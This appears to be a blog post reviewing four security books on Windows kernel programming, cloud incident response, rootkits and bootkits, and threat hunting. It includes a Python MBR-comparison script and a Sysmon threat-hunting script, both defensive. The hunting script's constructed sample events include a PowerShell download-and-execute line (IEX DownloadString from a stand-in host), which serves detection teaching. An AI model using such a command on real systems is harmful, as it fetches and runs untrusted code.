Windows Kernel Programming — Pavel Yosifovich
I started the year reading this book. I always wanted to learn more about how the Windows kernel works, and there is no better way to understand it than learning how to develop a Windows driver, which is loaded into the kernel.
The book starts with an overview of Windows internals before explaining how to prepare the environment, how to develop your first driver (a ‘Hello world’ driver) and how to load it.
After learning how to write the first lines of code of a kernel driver, the book explains the differences between user-mode and kernel-mode development: for example, if you make a mistake, not just the driver but the entire system is affected. One of the most important topics related to this is how to debug the kernel, and the book explains how to use two machines to do it, since with a single machine a breakpoint would freeze the entire system.
Among other topics, by the end of the book you will be able to develop a Sysmon-like tool, which is very useful for understanding, for example, how an EDR works. This book is highly recommended for those who want to understand more about kernel mode, whether for monitoring or for exploitation.
Incident Response in the Age of Cloud — Erdal Ozkaya
I have a lot of interest in the Incident Response (IR) field, and when I heard about this book for the first time I immediately put it on my wishlist, especially because I had read ‘Cybersecurity — Attack and Defense Strategies’, a book Erdal wrote together with Yuri Diogenes, which is one of the best cybersecurity books I have ever read. So I couldn’t expect less from this book.
The book starts with an introduction to IR and, since it was written this year, it offers an interesting point of view on the implications of COVID-19 for the cybersecurity field and how it increases the chance of an incident happening.
It covers the whole IR process, whether in the cloud or not, but, believe me, the content is very interesting and worth reading even if you already know the process and are reading the book mainly for the cloud content. Even so, some topics mention IR in the cloud, and one part covers a hands-on IR in a phishing scenario. After that, there is a chapter specific to IR in the cloud, in which the MITRE ATT&CK Cloud matrix is used to explain some cloud-related attacks.
As mentioned before, it is worth reading even the parts not related to the cloud. The last chapter contains texts by other professionals who have worked with IR for many years, each covering a different topic. This last chapter reinforces the idea that it is a very interesting book to read.
Rootkits & Bootkits — Alex Matrosov & Eugene Rodionov
I heard about this book some time ago, but I always wondered whether I was ready to read about this topic. Fortunately, I read ‘Windows Kernel Programming’ first, and I can easily say that it was decisive for understanding this book, since knowledge of how the Windows kernel works is required to understand rootkits (and bootkits).
The book starts by talking about rootkits, more specifically with case studies. After that it talks about bootkits, which take up most of the book, and explains the motivations for developing bootkits instead of rootkits. One of those reasons is explained in ‘Windows Kernel Programming’: on x64 systems you have to enable test-signing mode to load unsigned kernel drivers, and enabling it requires a system restart.
In the bootkit part you read a lot about the boot process, the MBR and the VBR, and how to infect them. After these explanations and a discussion of some bootkits that have already been developed, there are two important chapters: one about how to perform static analysis of a bootkit using IDA Pro and another about emulation and virtualization to perform dynamic analysis.
Personally, it was great for me to learn more about the MBR, since I had already studied it when I was learning forensics. And speaking of forensics, the last part of the book is about how to investigate possible bootkit infections, including an explanation of how to extract data from firmware and how to analyze it.
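As an added example (this is not code from the book or from this post), the following Python script does the first step of the bootkit investigation just described: it parses the 512-byte MBR layout the book walks through (446 bytes of bootstrap code, four 16-byte partition entries, the 0x55AA signature) and compares the boot code of a suspect sector against a known-good baseline. The sector bytes, the partition layout and the "infected" boot code are all constructed for the example; the boot code is a placeholder, not a real loader.

```python
"""Parse a classic (non-GPT) MBR and flag bootstrap code that differs from a baseline.

All sector bytes below are constructed for the example; the boot code is a
placeholder, not a real loader.
"""
from __future__ import annotations

import hashlib
import struct
from dataclasses import dataclass

SECTOR_SIZE = 512
BOOT_CODE_LEN = 446            # bytes 0-445: bootstrap code (plus disk signature area)
PARTITION_TABLE_OFFSET = 446   # four 16-byte entries at bytes 446-509
ENTRY_FORMAT = "<B3sB3sII"     # status, CHS start, type, CHS end, LBA start, sector count
BOOT_SIGNATURE = b"\x55\xaa"   # bytes 510-511

PARTITION_TYPES = {0x07: "NTFS/exFAT", 0x0B: "FAT32", 0x0C: "FAT32 (LBA)",
                   0x83: "Linux", 0xEE: "GPT protective"}


@dataclass(frozen=True)
class PartitionEntry:
    index: int
    bootable: bool
    type_id: int
    lba_start: int
    sector_count: int

    @property
    def type_name(self) -> str:
        return PARTITION_TYPES.get(self.type_id, f"unknown (0x{self.type_id:02x})")


def parse_mbr(sector: bytes) -> tuple[bytes, list[PartitionEntry]]:
    """Split a 512-byte MBR into its boot code and the used partition entries."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError(f"expected {SECTOR_SIZE} bytes, got {len(sector)}")
    if sector[510:512] != BOOT_SIGNATURE:
        raise ValueError("missing 0x55AA boot signature; not an MBR")
    entries = []
    for i in range(4):
        status, _, ptype, _, lba, count = struct.unpack_from(
            ENTRY_FORMAT, sector, PARTITION_TABLE_OFFSET + i * 16)
        if ptype == 0:          # unused slot
            continue
        entries.append(PartitionEntry(i, status == 0x80, ptype, lba, count))
    return sector[:BOOT_CODE_LEN], entries


def boot_code_sha256(boot_code: bytes) -> str:
    return hashlib.sha256(boot_code).hexdigest()


def compare_mbr(baseline: bytes, suspect: bytes) -> dict[str, bool]:
    """A bootkit typically rewrites the boot code but preserves the partition table
    so the system still boots, so the two changes are reported separately."""
    base_code, base_parts = parse_mbr(baseline)
    sus_code, sus_parts = parse_mbr(suspect)
    return {
        "boot_code_changed": boot_code_sha256(base_code) != boot_code_sha256(sus_code),
        "partition_table_changed": base_parts != sus_parts,
    }


def read_first_sector(device_path: str) -> bytes:
    r"""Read sector 0 from a raw device or disk image, e.g. '\\.\PhysicalDrive0' on
    Windows (needs administrator rights) or '/dev/sda' on Linux (needs root)."""
    with open(device_path, "rb") as fh:
        return fh.read(SECTOR_SIZE)


# ---- constructed sample data ---------------------------------------------------
def make_entry(bootable: bool, ptype: int, lba_start: int, sector_count: int) -> bytes:
    return struct.pack(ENTRY_FORMAT, 0x80 if bootable else 0x00, b"\0\0\0", ptype,
                       b"\0\0\0", lba_start, sector_count)


def make_mbr(boot_code: bytes, entries: list[bytes]) -> bytes:
    table = b"".join(entries).ljust(4 * 16, b"\0")
    return boot_code.ljust(BOOT_CODE_LEN, b"\0") + table + BOOT_SIGNATURE


PARTITIONS = [make_entry(True, 0x07, 2048, 204800)]       # one bootable NTFS volume
CLEAN_BOOT_CODE = b"\x33\xc0\x8e\xd0\xbc\x00\x7c"          # placeholder bytes, not a loader
INFECTED_BOOT_CODE = b"\xeb\xfe" + b"BOOTKIT-STAGE1"       # placeholder for rewritten code
CLEAN_MBR = make_mbr(CLEAN_BOOT_CODE, PARTITIONS)
SUSPECT_MBR = make_mbr(INFECTED_BOOT_CODE, PARTITIONS)     # same table, different code

if __name__ == "__main__":
    for entry in parse_mbr(SUSPECT_MBR)[1]:
        print(entry.index, entry.type_name, "bootable" if entry.bootable else "",
              entry.lba_start, entry.sector_count)
    print(compare_mbr(CLEAN_MBR, SUSPECT_MBR))
```

On a real system you would feed `read_first_sector()` the raw device and compare against the boot code hash recorded from a clean install of the same Windows version, since different versions ship different MBR code; a changed boot code with an untouched partition table is exactly the pattern the book describes for MBR bootkits, whereas a type 0xEE entry means the disk is GPT and the analysis moves to the VBR and the EFI partition.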
Since there are MANY technical details in this book, it is hard to talk about it briefly, but you will certainly learn many interesting topics which are important to know and are not widely discussed. As mentioned in the introduction of the book: “We came up with the idea for this book when, having published a series of articles and blog posts about rootkits and bootkits, we realized the topic wasn’t getting nearly as much attention as it deserved.”
Practical Threat Intelligence and Data-driven Threat Hunting — Valentina Costa-Gazcón
Knowledge of IR and of the details of how the operating system works (Windows in particular) is important for performing threat hunting, since you will be looking for something that is not generating an alert for the SOC, or something that can indicate a possible compromise.
But believe me, previous knowledge of these topics is not necessary to read this book, since it is very well explained and includes a detailed explanation of how to build your lab environment to conduct threat hunting. It is a real “from scratch” tutorial on how to configure a Windows Server and all its necessary components, and an ELK host to search the data.
It also explains how to run adversary emulation to generate data to be searched in ELK (while reminding you that in a real environment you will have noise). When it talks about adversary emulation with Atomic Red Team, it makes sure you understand how the emulation of some techniques of each tactic of the MITRE ATT&CK matrix works.
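As an added example (not code from the book, from Atomic Red Team or from this post), the script below runs a small hunt over Sysmon-style process-creation events (Event ID 1) of the kind that adversary emulation leaves behind: Office applications spawning a shell or script host, with the PowerShell -EncodedCommand payload decoded and each hit tagged with the ATT&CK techniques it maps to. It also stacks parent/child pairs by frequency, a common way to make rare pairs stand out in noisy data. The events, the lab host name, the paths and the allowlisted "corporate mail sync" script are all constructed for the example; in a real environment the allowlist would come from your own baseline.

```python
"""Hunt over constructed Sysmon-style process-creation events (Event ID 1) for Office
apps spawning a shell or script host, decode PowerShell -EncodedCommand payloads and
stack parent/child pairs so rare ones stand out. All events below are constructed."""
from __future__ import annotations

import base64
import re
from collections import Counter
from pathlib import PureWindowsPath

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Hypothetical baseline of known-benign automation: (parent, child, command-line substring).
# This is the "noise" a real environment produces; it is learned per environment, not shipped.
ALLOWLIST = [("outlook.exe", "powershell.exe", r"c:\corp\tools\mailsync.ps1")]

# powershell.exe accepts any unambiguous prefix of -EncodedCommand; the common ones are listed.
ENC_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def basename(image: str) -> str:
    return PureWindowsPath(image).name.lower()


def decode_encoded_command(cmdline: str) -> str | None:
    """-EncodedCommand carries base64 of the UTF-16LE script text."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def is_allowlisted(parent: str, child: str, cmdline: str) -> bool:
    return any(parent == p and child == c and needle in cmdline.lower()
               for p, c, needle in ALLOWLIST)


def hunt_office_spawned_shells(events: list[dict]) -> list[dict]:
    hits = []
    for ev in events:
        if ev["EventID"] != 1:
            continue
        parent, child = basename(ev["ParentImage"]), basename(ev["Image"])
        if parent not in OFFICE_APPS or child not in SCRIPT_HOSTS:
            continue
        if is_allowlisted(parent, child, ev["CommandLine"]):
            continue
        techniques = ["T1204.002"]                      # User Execution: Malicious File
        if child in {"powershell.exe", "pwsh.exe"}:
            techniques.append("T1059.001")              # PowerShell
        elif child == "cmd.exe":
            techniques.append("T1059.003")              # Windows Command Shell
        elif child in {"wscript.exe", "cscript.exe"}:
            techniques.append("T1059.005")              # Visual Basic
        elif child == "mshta.exe":
            techniques.append("T1218.005")              # System Binary Proxy Execution: Mshta
        decoded = decode_encoded_command(ev["CommandLine"])
        if decoded is not None:
            techniques.append("T1027")                  # Obfuscated Files or Information
        hits.append({"UtcTime": ev["UtcTime"], "Computer": ev["Computer"], "Parent": parent,
                     "Child": child, "Techniques": techniques, "DecodedCommand": decoded})
    return hits


def stack_parent_child(events: list[dict]) -> list[tuple[tuple[str, str], int]]:
    """Frequency analysis ("stacking"): rarest parent/child pairs first."""
    counts = Counter((basename(e["ParentImage"]), basename(e["Image"]))
                     for e in events if e["EventID"] == 1)
    return sorted(counts.items(), key=lambda kv: kv[1])


# ---- constructed sample events ---------------------------------------------------
def make_event(time: str, parent: str, image: str, cmdline: str, event_id: int = 1) -> dict:
    return {"EventID": event_id, "UtcTime": time, "Computer": "WS01.lab.local",
            "ParentImage": parent, "Image": image, "CommandLine": cmdline}


PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD_IMAGE = r"C:\Windows\System32\cmd.exe"
OFFICE_DIR = r"C:\Program Files\Microsoft Office\root\Office16"
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii")

EVENTS = [
    make_event("2021-01-10 10:00:01", r"C:\Windows\explorer.exe", CMD_IMAGE, "cmd.exe"),
    make_event("2021-01-10 10:00:05", r"C:\Windows\System32\services.exe",
               r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs"),
    make_event("2021-01-10 10:01:10", OFFICE_DIR + r"\WINWORD.EXE", PS_IMAGE,
               f"powershell.exe -nop -w hidden -enc {ENCODED}"),
    make_event("2021-01-10 10:02:00", OFFICE_DIR + r"\OUTLOOK.EXE", PS_IMAGE,
               r"powershell.exe -ExecutionPolicy Bypass -File C:\corp\tools\mailsync.ps1"),
    make_event("2021-01-10 10:03:00", OFFICE_DIR + r"\EXCEL.EXE", CMD_IMAGE, "cmd.exe /c whoami"),
    make_event("2021-01-10 10:04:00", r"C:\Windows\explorer.exe", CMD_IMAGE, "cmd.exe"),
    make_event("2021-01-10 10:04:30", "", PS_IMAGE, "", event_id=3),  # network event, ignored
]

if __name__ == "__main__":
    for hit in hunt_office_spawned_shells(EVENTS):
        print(hit["UtcTime"], hit["Parent"], "->", hit["Child"], hit["Techniques"], hit["DecodedCommand"])
    for (parent, child), n in stack_parent_child(EVENTS):
        print(f"{n:4d}  {parent} -> {child}")
```

The same logic expressed as an ELK query would filter `event_id:1 AND parent_image:(*winword.exe OR *excel.exe ...) AND image:(*cmd.exe OR *powershell.exe ...)` and then use a terms aggregation on the parent/child pair; the allowlist is where the hunting loop turns a noisy result into a repeatable detection.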
Reading the book you will also notice that it cares that you document your results and assess them to ensure they have good quality; it even shows a framework to start with, because that makes it easy to show results and their value to the C-level. The book also mentions the projects related to a methodology made by Roberto and José Rodriguez, who are part of the Open Threat Research (OTR) community, and they are certainly worth a look.
You will find a lot of information in this book and, as I mentioned before, the entire book is very well explained. Threat hunting is commonly seen as something to be conducted by someone with many years of experience, but with this book you will learn what you need to conduct this activity. Due to the format of the content, previous experience is not required to read it; the only requirement is the desire to learn about this topic.